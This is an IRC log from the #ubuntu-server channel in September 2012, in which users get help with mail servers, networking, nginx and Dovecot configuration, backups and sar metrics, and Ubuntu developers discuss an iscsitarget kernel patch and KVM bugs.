<ogra_> it comes with a thin client classrom server installation on the CD
<ogra_> but yeah,on the desktop side it has edu SW
<sternfan2012> yes - edubuntu is an LTSP server
<sternfan2012> ogra - I checked out #edubuntu - pretty much dead today
<ogra_> well, its labour day in the US apparently, so that side of the world might be pretty much offline
<ogra_> (probably in canada too)
<ogra_> sternfan2012, if your quations are actually LTSP specific, try also #ltsp ;)
<sternfan2012> Here's my Q - I need to log all websites visited in quid.  When I move to a thin client - they should all get their own IP - but when they start browsing will that show up in the logs?
<sternfan2012> I haven't used thin client in ages
<ogra_> *questions
<uvirtbot> New bug: #1045444 in amavisd-new (main) "amavisd-new tries to load perl modules that don't exist" [Undecided,New] https://launchpad.net/bugs/1045444
<shadedpixel> Hi, could anybody help me with this? http://pastebin.com/raw.php?i=hqBWpQMn
<lunaphyte> hi.  i have a handful of packages that, while not required for a particular piece of software [amavisd-new], i've installed manually to extend its capabilities.  can i somehow in the packaging system mark a relationship between them, so later on, when i can't remember what some particular package was for, the system can help me remember?
<eshlox> hi, who uses the uwsgi? i still get the meessage: group www-data not found (exists in the file groups), if i try add uwsgi user and group.. still the same, suggestions?
<WARACE> Hi
<WARACE> I am looking to build a ubuntu server with apache and a mail server
<RoyK> !mail
<ubottu> Mail is another medium to communicate. Ubuntu mailing lists can be found at http://lists.ubuntu.com
<RoyK> !mailserver
<ubottu> Ubuntu supports the Simple Mail Transfer Protocol (SMTP) and provides mail server software of many kinds. You can install a basic email handling configuration with the "Mail server" task during installation, or with the "tasksel" command. See also https://help.ubuntu.com/community/MailServer and https://help.ubuntu.com/10.04/serverguide/C/email-services.html
<RoyK> !webmail
<lunaphyte> a mail server for what?
 * RoyK guesses SMTP and IMAP and a web-based frontend
<lunaphyte> often, people who ask about "mail servers" in the context of a web server just want to send email notifications etc.
<RoyK> WARACE: ?
<WARACE> I see Zimbra
<RoyK> zimbra works well, in a VM
<RoyK> but doesn't work well with other ubuntu services
<WARACE> I am looking for Ease of use and easy management
<RoyK> it uses a separate installed base of both mail and web services
 * RoyK uses zimbra in a VM
<WARACE> also if I want to build a second backup server to mirror my main apache/mail server can this be done?
<WARACE> Sorry for the noob questions
<WARACE> I can script and build pages deploy apache and other services but never really built a server for myself
<WARACE> I want to be able to host my own site with redundancy I am open to suggestions
<WARACE> I was thinking of building 3 servers
<WARACE> one for pre-development testing of my scripts and pages
<WARACE> and QA
<WARACE> one as the production server and one as a backup so when I need to maintain the main server I can put the backup online
<RoyK> WARACE: if you want to use zimbra for this, I'd recommend #zimbra, not here
<WARACE> RoyK: is there any other mail server you would recommend I am not only leaning towards zimbra
<RoyK> zimbra isn't supported by ubuntu/canonical and will probably never be, the way zimbra seems to want to close down on details and refrain from going totally open, as in, post packages compatible with ubuntu and other distros
<RoyK> WARACE: as I said, I use Zimbra myself, but isolated in a VM, since it doesn't work well with installed packages of apache+postfix+++
<RoyK> WARACE: YMMW, but there are several other solutions out there - zimbra still works well, but it needs to be in a separate environment
<lunaphyte> thing is, zimbra isn't a mail server.  it's a groupware system.  those are two completely different things
<lunaphyte> zimbra is also recently becoming more and more proprietary/commercial
<RoyK> lunaphyte: those are not completely different things, if zimbra were released as packages, it would be very well welcomed to most distros. unfortunately, they stick to separte installs to sell commmercial licenses
<WARACE> I want plain Apache, MySQL, PHP
<WARACE> and a mail server
<RoyK> !mailserver
<ubottu> Ubuntu supports the Simple Mail Transfer Protocol (SMTP) and provides mail server software of many kinds. You can install a basic email handling configuration with the "Mail server" task during installation, or with the "tasksel" command. See also https://help.ubuntu.com/community/MailServer and https://help.ubuntu.com/10.04/serverguide/C/email-services.html
<RoyK> !apache
<ubottu> LAMP is an acronym for Linux-Apache-MySQL-PHP. However, the term is often used for setups using alternative but different software, such as Perl or Python instead of PHP, and Postgres instead of MySQL. For help with setting up LAMP on Ubuntu, see  https://help.ubuntu.com/community/ApacheMySQLPHP - See also the Server CD installation process (different in Edgy+)
<RoyK> !php
<ubottu> PHP is an HTML-embedded scripting language. A command-line only version can be installed in Ubuntu with the "php5-cli" package. See also !lamp for integrated server PHP. The Ubuntu server PHP5 guide is found at https://help.ubuntu.com/10.04/serverguide/C/php5.html
<lunaphyte> huh?  a groupware system and a mail server are completely different things, yes.
<RoyK> WARACE: it's no problem building an open mail- or groupware system completely by hand
<RoyK> WARACE: it just takes a bit more time than installing zimbra, and it probably won't be as sexy
<WARACE> then I want to be able to mirror that to a backup server
<RoyK> then you use DRBD and heartbeat or something like that
<RoyK> works with most systems
<RoyK> zimbra doesn't work well without that either
<RoyK> or you use a commercial-grade SAN with replication
<RoyK> or...
<WARACE> yeah sounds like i need to stay away from that for what i need
<RoyK> well, you probably need DRBD etc for anything if you want to replicate a live system
<RoyK> regardless of what you choose
<WARACE> Great I will research it
<RoyK> HA clustering isn't a stroll in the park, it takes a bit of studies
<WARACE> I love to study :-)
<Troy^> do any of you host your own website on your own box?
<WARACE> Sounds like fun
<RoyK> WARACE: I spoke to met.no (norwegian meteorolgial institute) - they use zimbra with drbd and heartbeat, two locations, full failover
<RoyK> WARACE: and zimbra is good, but it needs to be on a dedicated machine, or VM, but then KVM is part of Ubuntu, and not very hard to setup
<WARACE> ok so Zimbra on its own box
<RoyK> or VM
<WARACE> and my Apache SQL PHP on its own box with DRBD
<Troy^> hmm my linux box is at like 44% memory usage
<RoyK> apache/php/mysql/postgresql/whatever for other uses than email/groupware should be in a separate VM
<RoyK> DRBD used to mirror two zimbra installations
<RoyK> zimbra includes email+apache+php+java+whatever
<WARACE> Hmmm I will take a deep look into that tonight
<Troy^> is there a way to see what processes are using the most memory?
<RoyK> top
<RoyK> M
<WARACE> I need to get to work lol so I can afford to buy this equiptment
<WARACE> Troy* wont ps aux give you a list of that?
<RoyK> WARACE: seriosly - you want to setup a redundant zimbra installation for private purposes?
<WARACE> RoyK its for a project I want to deploy
<WARACE> I don't want to use a third party host
<WARACE> I have a 50/50Mbps line here
<WARACE> doing nothing lol
<RoyK> WARACE: ok, get some cheap machines off ebay ;)
<WARACE> so I figured I will put it to good use since I am paying for it
<RoyK> WARACE: keep in mind that a redundant installation should be separated so that if your link goes down, the site doesn't
<WARACE> True
<RoyK> meaning redundant BGP routing in place
<RoyK> not very easy to get from your common ISP :P
<WARACE> My ISP offers anything I like but they will charge me for it lol
<Troy^> i wonder where i can find cheap dual channel 2gb ddr sets
<WARACE> $200 business line
<RoyK> WARACE: only problem is, you need two different ISPs to be sure about the link
<Troy^> lol business packages don't block web and email servers right?
<RoyK> WARACE: and you need your own IP addresses, with BGP routing, and routers supporting that
<WARACE> all my ports are open
<WARACE> and I am in a regular home package now
<RoyK> lol
<Troy^> hmm i have one more stick of 256mb of ram i can put in my box
<WARACE> yeah business line provides static ips
<RoyK> meaning your ISP will probably smile at you if you ask for redundant BGP routing ;)
<Troy^> currently have 1.5gb of ram in it but 44% is being used :S
<WARACE> I have 16GB of ram on this computer
<WARACE> :-)
<Troy^> this one here has 8gb.. but my cheap p4 linux server doesn't have very much
<Troy^> takes ddr1
<WARACE> DDR3 here
<WARACE> well ttyl
<RoyK> WARACE: one small tip: there's no reason to setup a redundant zimbra installation in a single site, and to make it dual-site, you'll need BGP routing, meaning you will need a separate IP subnet, and a good deal with two ISPs. That won't be cheap
<RoyK> WARACE: better make a single-site-setup with good redundancy on the disks, PSUs etc, and forget about DRBD and friends
<WARACE> Not too worried about pricing I will leave that up to the financial partner
<WARACE> He likes my idea he wants to put money down on it
<WARACE> I just don't want my scripts on anyone elses servers
<RoyK> WARACE: you'll also need other links, home ISPs don't deliver BGP, nor subnets
<WARACE> I will upgrade Verizon here does anything for money
 * RoyK wonders what WARACE is smoking
<WARACE> So does Cablevision
<WARACE> And i guess if I can not get the lines put in here I can get them installed at the office site
<Troy^> jeez wth are you doing lol
<WARACE> He has a T1 line at the office which to me is garbage
<Troy^> ya T1 is dumb
<RoyK> 1.54Mbps
<RoyK> \o/
<Troy^> i get 4 times that
 * RoyK has 60Mbps symmetric FTTH
<Troy^> yea i have ftth too
<Troy^> 50/30
<WARACE> i have 50/50Mbps FIOS
<RoyK> FIOS?
<RoyK> FTTP!
<WARACE> Fiber Optic Service
<Troy^> i want to see how fast i can upload to someone
<Troy^> never really tried it
<Troy^> http://speedtest2.eastlink.ca/larger.file.bin 2012-09-03 16:37:52 (4.62 MB/s) - `larger.file.bin' saved [262144000/262144000]
<RoyK> WARACE: FTTH is the name for that - fiber to the home - or FTTP - fiber to the porn, for some ;)
<Troy^> i can get 5.7MBps
<Troy^> anyone have a ftp i can see how fast i can upload to you. i want to test it out
 * RoyK gets 7MB/s or so
<Troy^> only crappy thing my ip is dynamic
 * RoyK has static ip
<RoyK> too bad they don't have ipv6 so far
<Troy^> yea everything should move to ipv6
<WARACE> LOL
<WARACE> Verizon calls it FIOS here
<Troy^> BellAliant calls it FibreOP here
<WARACE> Fiber Optic Sexcapades
<WARACE> involves allot of handy work
<RoyK> ;)
<WARACE> lol
<WARACE> and self deployment
<Troy^> WARACE: got a ftp setup i can test how fast i can upload?
<SpinningWheels1> i have a box that seems to be having some interesting networking issues that i have not encountered before. i can connect to services on it from inside the LAN. when i attempt to ping google from the box, it can successfully resolve the DNS but will fail with "Network is unreachable". It seems to be working but refuses to access the internet.
<SpinningWheels1> same story with the vm that is on it
<Troy^> still sounds like a DNS issue
<lunaphyte> ping via ip address, and solve that first
<lunaphyte> if you can't figure it out, pastebin ifconfig -a; route -n
<Troy^> 173.194.75.94 that is one of google's ips
<SpinningWheels1> Network is unreachable. one of my tests was a wget google.com, it listed about 10 of google's ip's which is what lead me to believe that DNS was working. incorrect assumption?
<lunaphyte> [4:20pm] lunaphyte: if you can't figure it out, pastebin ifconfig -a; route -n
<lunaphyte> [4:20pm] Troy^: 173.194.75.94 that is one of google's ips
<lunaphyte> oops
<Troy^> haha!
<lunaphyte> [4:20pm] lunaphyte: ping via ip address, and solve that first
<lunaphyte> that was the one i intended to repeat
<SpinningWheels1> okay
<lunaphyte> pick an address that you can demonstrate pings successfully from elsewhere
<SpinningWheels1> okay, it can ping any LAN PC, any LAN PC can ping it, as well as access it's services. I can resolve DNS queries with dig (even tried .coms that i NEVER visit). Cannot ping any resource on the internet. my ifconfig appears as it always does, my route -n has http://pastebin.com/jCr8zZ4S
<lunaphyte> [4:22pm] lunaphyte: [4:20pm] lunaphyte: if you can't figure it out, pastebin ifconfig -a; route -n
<lunaphyte> please follow directions if you'd like free help.
<jMCg> heh
<Troy^> there another 256mb of ram installed in server
<SpinningWheels1> i graciously thank you for your "free help". i am open to alternative avenues.
<lunaphyte> again...
<lunaphyte> "if you can't figure it out, pastebin ifconfig -a; route -n"
<ehnde> is there any way i can regenerate /etc/mime.types ?
<ehnde> nginx: [emerg] unknown directive "application/activemessage" in /etc/mime.types:821
<lunaphyte> why do you need to regenerate it?
<ehnde> lunaphyte: i figured i edited it at one point in time (don't remember)
<lunaphyte> why not just address the offending entry?
<ehnde> the error doesn't make sense, there are no ; or } anywhere in the file
<lunaphyte> i don't see any references to ; or } in the error you shared
<ehnde> ahh, yes you are right...looks like the error is different now. my mistake!
<ehnde> i still feel it'd be easier to regenerate that file
<lunaphyte> you'd simply want to do what's right, not easier.
<lunaphyte> imo, if you don't remember what you've done to that file, you'd want to compare it to a backup
<ehnde> it's saying unknown directive "application/activemessage on line 821 if i'm reading it right
<lunaphyte> yes, that's likely
<ehnde> line 821 is x-world/x-vrml
<Troy^> anyone here haven't signed up for ubuntu one storage yet want to sign up and give both us an extra 500mb of storage?
<lunaphyte> ehnde: the way parsers generally work, the line number is a clue, not an answer.
<lunaphyte> if you can't figure it out, pastebin the preceding and following 20 or so lines
<ehnde> restored a backup of the file, now i'm going to pastebin the original error and those 20 lines
<ehnde> http://pastebin.com/05cyUuJw
<ehnde> maybe it's a problem with nginx
<lunaphyte> which line in your pastebin is 821 now?
<lunaphyte> oh, 822, rather
<ehnde> the last line in the pastebin post is line # 821
<lunaphyte> ...
<lunaphyte> "the preceding and following 20 or so lines"
<ehnde> ah yes, reading failure
<lunaphyte> cat -n /etc/mime.types
<lunaphyte> pastebin lines 800-850
<ehnde> 822 is eof
<lunaphyte> ah
<ehnde> http://pastebin.com/PH5zT78H
<ehnde> if i put a ; at the very end, it complains about the first line in the file
<lunaphyte> so there's your clue
<lunaphyte> is nginx intended to use the system mime types file?
<ehnde> well... /etc/nginx/mime.types exists :o
<ehnde> and...it's formatted differently!
<lunaphyte> perhaps that's the one you should be using then for nginx?
<ehnde> it must be
<ehnde> nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
<ehnde> thanks lunaphyte!
<lunaphyte> sure thing
<Troy^> is there anyway to upload a file to my ubuntu one account via term?
<jeeves_moss> has anyone had any issues with Postfix and Dovecot after a dist upgrade?
<JanC> jeeves_moss: what sort of issues?
<JanC> and what do you mean by "dist upgrade" ?
<jeeves_moss> JanC, I did a do-dist-upgrade
<JanC> there have been some changes in the (recommended) config options for dovecot over the years
<lunaphyte> why not share the specific problem you're having?
<jeeves_moss> I'm getting an error code of "init: dovecot main process (25571) terminated with status 89"
<JanC> although I think in most cases they were just deprecating things and not removing them
<lunaphyte> jeeves_moss: pastebin doveconf -n
<JanC> reading Dovecot upgrade notes / changelogs might be useful
<jeeves_moss> lunaphyte, one sec
<jeeves_moss> lunaphyte, http://pastebin.com/CXv3Lju5
<lunaphyte> huh
<lunaphyte> i did not ask for that.
<lunaphyte> oh well, off to do other things.  good luck.
<jeeves_moss> lunaphyte, ok, thanks anyways
<jeeves_moss> lunaphyte, http://pastebin.com/W65Xeqzg
<JanC> jeeves_moss: the error on the end of that should give you a clue about where to look  âº
<JanC> actually, 2 errors there
<jeeves_moss> JanC, yea.  I just haven't had the paticene to sit down and figure it out.
<JanC> one about an ssl certificate, and one about missing a driver for the password database (that last one sounds like you're missing the dovecot-mysql package)
<jeeves_moss> JanC, yes, I am using MySQL.  I'm going to try to fix that first.
<JanC> the other error is that it seems like your config doesn't point to an ssl certificate (or points to a file that doesn't exist or ...)
<jeeves_moss> JanC, I'm not 100% why a dist upgrade would break stuff
<JanC> jeeves_moss: depends on how you installed it
<jeeves_moss> JanC, the "do-dist-upgrade" command
<JanC> I mean how you installed it in a previous version
<jeeves_moss> JanC, "apt-get install dovecot", etc
<JanC> there were no separate dovecot-<database> packages in Lucid
<jeeves_moss> JanC, no idea.  I do remember getting it from APT
<JanC> and I think the upgrade should work fine if you installed the 'dovecot' metapackage, but maybe not if you only installed the packages you actually needed separately
<JanC> (but I didn't test that upgrade...)
<jeeves_moss> I dont think so.  I'll have another look
<JanC> jeeves_moss: so, does installing dovecot-mysql help to fix one of those 2 bugs?
<jeeves_moss> I think it is.  let me look
<jeeves_moss> weird, I wonder why it wasn't installed
<JanC> do/did you have dovecot-common installed?  (that seems to be the "transitional package" that should pull in dovecot-mysql & co. on upgrades)
<jeeves_moss> yep, it's installed
<JanC> hm, seems like the dependencies are only listed as suggested, so that might explain something
<jeeves_moss> ??
<JanC> it might explain why the dovecot-mysql package isn't installed
<pmp6nl> I have mounted an ubuntu server to by ubuntu laptop via fstab and sshfs.  I want to do backups via this, however my user does not have access to some of the folder/files, iE: var/log.  is there a safe way to give the user access to back these files up?  Thanks
<JanC> pmp6nl: how can it be safe for a user to backup files it is not allowed to read?
<pmp6nl> JanC, Good question.  But is it more safe to ssh in as root?
<JanC> in case of /var/log, usually you can read files in there if the user is a member of group 'adm'
<JanC> but not in all cases, I guess
<pmp6nl> What about other files JanC -- I am looking for a good way to backup files to my laptop and I figured rsync via the mount would be a good option.  But I see permission read errors
<JanC> pmp6nl: one thing you could do is to have a cron job that makes an archive of those files, and then uses chown/chmod to give the backup user access to the archive
<JanC> you could even use encryption on the archive, that way the user can backup the archive, but not read its contents...
<jeeves_moss> JanC, what's the dovecot command to check for erros again?
<pmp6nl> JanC, Humm, that may work.  I wonder how much harder that will make keeping versions of each file.  I dont care if the user can read the backup as the user is me
<JanC> for configuration errors: "doveconf -n"
<lunaphyte> jeeves_moss: can't you read you scrollback, dude?
<jeeves_moss> JanC, thank you.  and no, Xchat sucks
<lunaphyte> why not use an irc client that doesn't suck?
<JanC> jeeves_moss: Xchat has great scrollback support...
<jeeves_moss> it locked up, so I can't scroll back
<JanC> it will show scrollback even after you restart it...
<jeeves_moss> anyways...  Now, lt's figure out why it can't see the MySQL driver
<JanC> pmp6nl: in that case, maybe you can configure sudo to allow the backup command
<pmp6nl> JanC, humm, perhaps.  I will have to research that as I do not know much about the topic
#ubuntu-server 2012-09-04
<bikcmp> I want to make an application run on startup
<bikcmp> however, I want it to run as a user.
<patdk-lap> bikcmp, add it to contrab
<patdk-lap> crontab
<bikcmp> patdk-lap: i've already gotten it from a kind man in #ubuntu
<bikcmp> patdk-lap: i ended up going the /etc/rc.local route
<bikcmp> about to test it.
<uvirtbot> New bug: #1044229 in maas "DHCP config doesn't get written unless an inhuman combination of scripts is run" [Undecided,New] https://launchpad.net/bugs/1044229
<Xirre> If I wanted to make a Shell Server where people can upload only a specific file type, (.dmb and .rsc) how would I go about doing so? They can also run, 'DreamDaemon "world.dmb" <port>' which will be a command to be ran. It basically runs the .dmb file and it opens the world so others can join. Is there any way I can do this?
<qman__> for something that specific, your best option is writing up a web interface to do it
<qman__> restricting shell access to something so narrow will be very difficult
<Xirre> Agh. I already tried writing up one. I got stuck. I know basic php, html, a bit of shell, and some programming languages.
<Xirre> What if I didn't have to restrict the file type? I can worry about that part later.
<Xirre> I am back.
<drag0nius> what is (squid-1) process? including brackets
<drag0nius> i've removed squid3 package but this one was still running and responding on 3128
<uvirtbot> New bug: #1045635 in keystone (main) "python-keystoneclient is missing /usr/bin/keystone " [Undecided,Invalid] https://launchpad.net/bugs/1045635
<jamespage> Daviey, I'll pickup that iscsitarget SRU if you like; I'll do it after beta-1 as we really need to merge with Debian in quantal first
<Daviey> jamespage: rocking!
<jamespage> Daviey, actually thats not seeded anymore - I'll do it today
<spidernik84> Hi everyone. Is the vm-builder project dead on 12.04?
<uvirtbot> New bug: #992012 in openvpn "No /openssl.cnf file could be found because of a wrong regex in whichopensslcnf" [Undecided,Confirmed] https://launchpad.net/bugs/992012
<eagles0513875_> hey guys is there a place where i can get the list of repositories for ubuntu server 12.04
<ikonia> what do you mean a list of repositories ?
<eagles0513875_> a list of default repositories
<ikonia> what do you mean default repositories ?
<eagles0513875_> my server is using the DC's local mirrors im trying out an experiment
<eagles0513875_> in terms of creating my own repo
<ikonia> so you want the mirror list
<ikonia> not repositories
<eagles0513875_> when i say repositories i mean like main universe etc
<ikonia> you have those in your install
<ikonia> sorry, I'm not understanding what you actually want
<eagles0513875_> sorry for the confusion i just figured it out :(
<ikonia> did you mean something like this http://ubuntu.virginmedia.com/archive/dists/precise/
<ikonia> ?
<spidernik84> or this? http://repogen.simplylinux.ch/
<spidernik84> is there anyone doing automated virtual machines creation?
<eagles0513875_> ikonia: ya thats it
<thierry> Hi everyone, i'm working on an ubuntu-server image on my Pandaboard - :) - and i'm trying to connect a GPS / RFID  / GPRS to my system; the problem is that in a normal ubuntu environment theses devices are attached on /dev/ttyUSB* ( for GPS and GPRS) and /dev/ttyACM* ( for RFID) but on my system they are plugged on /dev/usbdev*.**
<thierry> normally it's a usbserial driver issues
<thierry> anyone has an idea?
<thierry> i found some tutos that show how to enable usbserial for devices using their idProduct / Vendor : but i need this to be natively done by the system , regardless the GPS i'm connecting
<melmoth> thierry, sounds like something udev can help you with
<melmoth> (if it s just a matter of giving the device the name you want)
<thierry> melmoth:  it's not just the name
<thierry> with cutecom when the device is plugged on /dev/ttyISB i can open it , but not if it is plugged on /dev/usbdevx.y
<ogra_> sounds more like something for #ubuntu-kernel
<Kingsy> can someone in here talk to me for a moment about how to make sense of the results sar produces?
<thierry> :) ok 'ill try there
<melmoth> Kingsy, apt-get install ksar :-)
<Kingsy> melmoth: I have it installed, and I am looking at the results of the past 24 hours now. The thing I am asking is how to make sense of the results
<melmoth> not sure i understand the problem
<Kingsy> melmoth: for example, in "processes" there is a graph plotted with time / proc/s   <-- what exactly is proc/s ? it cant be processes I have a peak here at 87.5 proc/s
<Kingsy> that cant mean 87 and a half processes
<melmoth> sa record some metrics along time, then you can see what those metrics were (i/o , rm used, number of process) later on.
<melmoth> ksar just show it with picture so it s easier to feel how things chnaged according to time
<melmoth> number of process created by second i think
<Kingsy> so at a point in the day it created 87.5 processes per second? isnt that impossible? the server should have crashed.. and according to the load average it didnt go above like 2
<melmoth> http://linux.die.net/man/1/sar
<Kingsy> melmoth: I guess what I am trying to say is, the results just don't make any sense
<melmoth> you can create 87 new process per second.. sound slike a fork bomb.
<Kingsy> what is a fork bomb?
<melmoth> http://en.wikipedia.org/wiki/Fork_bomb
<Kingsy> melmoth: and your right yeah, ot does mean processes created per second, so for arguments sake, I wanted to try and find out WHY it did that..
<melmoth> either a malicious fork bomb, or, more likely, some daemon init script that failed to run the daemon, and try again, and again, and again
<Kingsy> melmoth: so, say you were looking at sar, and you spotted that spike, what would you check next in order to find out more about why that happened?
<melmoth> what does /var/log/syslog says for the date and time this happened ?
<Kingsy> melmoth: that file doesnt exist on our server
<jamespage> Daviey, really enjoying the iscsitarget rabbit hole - dkms module does not build with 3.5 kernel....
<melmoth> you have probably change the syslog configuration so it logs things elsewhere..
<jamespage> smb, are you around to pester for help with iscsitarget/linux 3.5 build issues?
<Kingsy> yeah I guess the hosting company did it.. man
<smb> jamespage, I would be again in a bit. You guys seem to sense whenever I am about to leave for lunch
<smb> jamespage, ;)
<jamespage> smb, lol - give me a ping when you are done then - thanks!
<smb> jamespage, Sure, will do :)
<Daviey> jamespage: I am jealous!  If you want to swap with something cooler, it's all yours.
<spidernik84> Hi all. Is there any alternative to ubuntu-vm-builder?
<xnox> spidernik84: python-vm-builder, debootstrap, ubuntu core, cloud images, lxc containers....
<jamespage> spidernik84, the cloud image builds switched a while back - lemme see if I can tell you what they use now - I think its livebuilder
<spidernik84> thanks guys :)
<Sachin__> Is there any alternative for ACL?
<Sachin__> Is there any alternative for Access Control Lists ?
<Daviey> jamespage: does ceph need xml2?
<jamespage> Daviey, rest-bench uses it - but that should remain in universe
<Daviey> jamespage: can you make sure it's handled? ta
<Daviey> (showing in c-m)
<jamespage> Daviey, how do I make that happen?  radosgw was as well but someone promoted it to main - I was expecting it to remain in universe
<Daviey> jamespage: Why was it promoted ?
<jamespage> Daviey, no idea
<jamespage> Daviey, can I tell who promoted it?
<Daviey> jamespage: no easily.
<Daviey> not*
<jamespage> Daviey, MIR has been requested but I think there are to many blockers for quantal IMHO - bug 1017978
<uvirtbot> Launchpad bug 1017978 in libfcgi "[MIR] libfcgi, ceph (radosgw)" [Medium,Fix released] https://launchpad.net/bugs/1017978
<Daviey> jamespage: ask in -release, see if anyone knows.
<smb> jamespage, So whats up with scsitarget? :)
<jamespage> smb, the dkms module is not so happy with the 3.5 kernel
<jamespage> smb, I've picked a patch from upstream but I had to rework some stuff myself - would you be OK to review?
<smb> jamespage, Yeah that has happened a few times. Yes, I could do. Where would I find your things?
<smb> jamespage, Which place did you pick things from? Just out of interest. The debian package or the svn repo?
<jamespage> smb, both - I merge in the latest packaging from debian, picked a few patches from upstream to resolve this and other bugs and added one myself!
<jamespage> I've tested it locally and it appears to work - but specifically this patch needs a review:
<jamespage> http://paste.ubuntu.com/1185604/
<jamespage> ioc_task_link changed in 3.5 to be a void function - so I had to rework its use
<jamespage> I think I have it right...
<smb> jamespage, Hm, not sure. Now you would only conditionally call ioc_taslk_link while before it was always done... Give me a min to think about that
<jamespage> smb, if you look at that function 3.4 and 3.5 you will see the change in behaviour
<smb> jamespage, right, I was about to do that
<jamespage> it won't work without a valid ioc context - whereas before the function would just return NULL
<smb> jamespage, Yes, it seems the null check moved away. It seems it used to have another fail point when the refcount was 0. So mostly I guess your version is ok (maybe one could make it more readable by having an else case and do the assignment in the true case). And we hope that current->io_context is only set with a ref-count and always NULL otherwise...
<jamespage> smb, I guess the "another fail point when the refcount was 0" was the bit that worried me a little
<koolhead16> my internet phewwwwwwwwww
<smb> jamespage, It seems that may be a guarantee... At least from the commit that removed the check: "ioc_task_link() is used to share %current's ioc on clone.  If
<smb>     %current->io_context is set, %current is guaranteed to have refcount
<smb>     on the ioc and, thus, ioc_task_link() can't fail."
<jamespage> smb, \o/
<jamespage> all good then...
<smb> jamespage, Yeah I think that there is hope. Well at least from their point of view. They talk of current in the fork context and iscsitarget code uses something else.
<smb> jamespage, But I guess whenever a task has a pointer to an ioc set there should be a reference (or there is something badly wrong with the usage of refcounting or the pointer)
<jamespage> smb, I think so
<dassouki> is there a way from terminal, I can list the 10 largest folders on my system, or folders that have more than 5gb in them includnig sub folders?
<zul> dassouki: yeah look at the man page for find
<dhanasekaran> HI, Guys i want go live session with ubuntu-server cd
<dhanasekaran> please guide me guys
<RoyK> dhanasekaran: there's no ubuntu server live cd
<RoyK> there's the desktop cd, and the server cd, the desktop can go live, the server cd can operate in two modes, install or recovery
<TheLordOfTime> dhanasekaran:  if you want a "live" server environment, install "desktop" onto a USB thumbdrive, add server packages
<TheLordOfTime> (I have a system here that is the GUI Desktop but has additional server packages, to act as a dev system
<TheLordOfTime> )
<dhanasekaran> TheLordOfTime, i want find mac address for my server, But My server have ubuntu-server cd How to find out mac address
<dhanasekaran> TheLordOfTime, it's new machine no os
<dhanasekaran> only have ubuntu-server cd
<patdk-lap> ifconfig
<dhanasekaran> i want deploy os remotely using cobbler tool using mac address
<dhanasekaran> please guide me.
<patdk-lap> boot the system, the pxe bios on the nic will tell you
<patdk-lap> or, tcpdump, and watch for dhcp requests from it when you turn it on
<TheLordOfTime> dhanasekaran:  you install ubuntu server and then find  the MAC address for the NIC
<TheLordOfTime> dhanasekaran:  or, you take apart the server and look at the NIC
<TheLordOfTime> it may be written right on it what its MAC is
<TheLordOfTime> (otherwise, you boot to a Desktop live session, run ifconfig -a in the terminal, and find the MAC)
<dhanasekaran> TheLordOfTime, server it's located remote place
<dhanasekaran> it's any way find mac address using ubuntu-server cd
<dhanasekaran> i can login into busybox shell but not getting mac address information
<TheLordOfTime> dhanasekaran:  no because the ubuntu server CD is not a live cd
<TheLordOfTime> if its a remote server, it should get an OS before you can truly get any real information
<dhanasekaran> it's a newly bot machine, there is no remote support hand,only machine power on state, inside ubuntu-server DVD
<cerberos> If http://pastie.org/4662177 is the output of cat /proc/cpuinfo should I be installing _i386.deb or _amd64.deb packages?
<_ruben> dhanasekaran: do you have remote kvm access?
<dhanasekaran> _ruben, yes
<dhanasekaran> _ruben, How to d it? any help
<Gargoyle> Hello.
<_ruben> then just follow patdk-lap's remark .. just hit the key to have it boot from pxe, and it'll show you the mac address it's using for that, unless it has a really broken pxe rom
<Gargoyle> Is there a quick way to get the installed list of packages from one server, into a format that can be used to install all the same packages on another server?
<_ruben> Gargoyle: there is, but i don't recall it from top of my head. should easy to find using google
<yeats> !clone
<ubottu> To replicate your packages selection on another machine (or restore it if re-installing), you can type Â« aptitude  --display-format '%p' search '?installed!?automatic' > ~/my-packages Â», move the file "my-packages" to the other machine, and there type Â« sudo xargs aptitude --schedule-only install < my-packages ; sudo aptitude install Â» (this currently may cause problems with multiarch) - See also !automate
<_ruben> right, that one :)
<Gargoyle> ahh. I was looking into dpkg options! :)
<uvirtbot> New bug: #1006966 in cloud-init "maas mirror values are overwritten by cloud-init" [Undecided,New] https://launchpad.net/bugs/1006966
<tmartiro>  I have problem changing network cards' affinity . After changing the smp_affinity , the changes are not applied. There is also bonding interface configured on host. Ubuntu 12.04 LTS. kernel  3.2.0-29-generic
<dhanasekaran> _ruben, thanks man. it's showing mac address
<dhanasekaran> !automate
<ubottu> Ways to automate installation of Ubuntu on multiple machines are described at https://help.ubuntu.com/10.04/installation-guide/i386/automatic-install.html - See also !cloning
<dhanasekaran> !cloning
<ubottu> To replicate your packages selection on another machine (or restore it if re-installing), you can type Â« aptitude  --display-format '%p' search '?installed!?automatic' > ~/my-packages Â», move the file "my-packages" to the other machine, and there type Â« sudo xargs aptitude --schedule-only install < my-packages ; sudo aptitude install Â» (this currently may cause problems with multiarch) - See also !automate
<uvirtbot> New bug: #1045845 in xorg (main) "12.10 guest crash on login when using 12.04 qemu-kvm with cirrus driver" [Undecided,New] https://launchpad.net/bugs/1045845
<xnox> interesting
<xnox> there is a similar bug of 12.10 guest cirrus driver not playing along with qemu-kvm on 12.10 host.
<xnox> and that was thought to be kernel bug in 12.10, because 12.04 guest works fine on qemu-kvm 12.10 host.
<jamespage> hallyn, around? I'm seeing a weird issue with my iscsi testing setup with libvirt/kvm
<hallyn> jamespage: i know 0 about iscsi, but shoot
<jamespage> my test VM's instantly go to paused state when I try to start them
<hallyn> jamespage: nohting in logs?  how about setting debug level to 1 in /etc/libvirt/libvirtd.conf?
<jamespage> hallyn, well not quite instantly - I get a little output
<soren> hallyn: Did you see my question here: https://bugs.launchpad.net/ubuntu/+source/libvirt/+bug/997978/comments/86
<uvirtbot> Launchpad bug 997978 in qemu-kvm "KVM images lose connectivity with bridged network" [High,Confirmed]
 * soren notes the time and runs off
<hallyn> soren: looking
<jamespage> hallyn, OK - here is a bit more - http://paste.ubuntu.com/1185918/
<jamespage> hallyn, looks like this bug 1045027
<uvirtbot> Launchpad bug 1045027 in linux "iPXE kills kvm with KVM: entry failed, hardware error 0x80000021" [Undecided,Confirmed] https://launchpad.net/bugs/1045027
<jamespage> hallyn, love it when I managed to answer my own question
<uvirtbot> New bug: #1045064 in quantum "Impossible to run Quantum Server from testing packages" [Undecided,New] https://launchpad.net/bugs/1045064
<jamespage> anyway that blocks me from testing iscsi root for beta-1
<hallyn> soren: great, thanks (commentin gin bug)
<hallyn> jamespage: ah, ok :)  i waspuzzling over Dave's bug submission a few mins ago :)
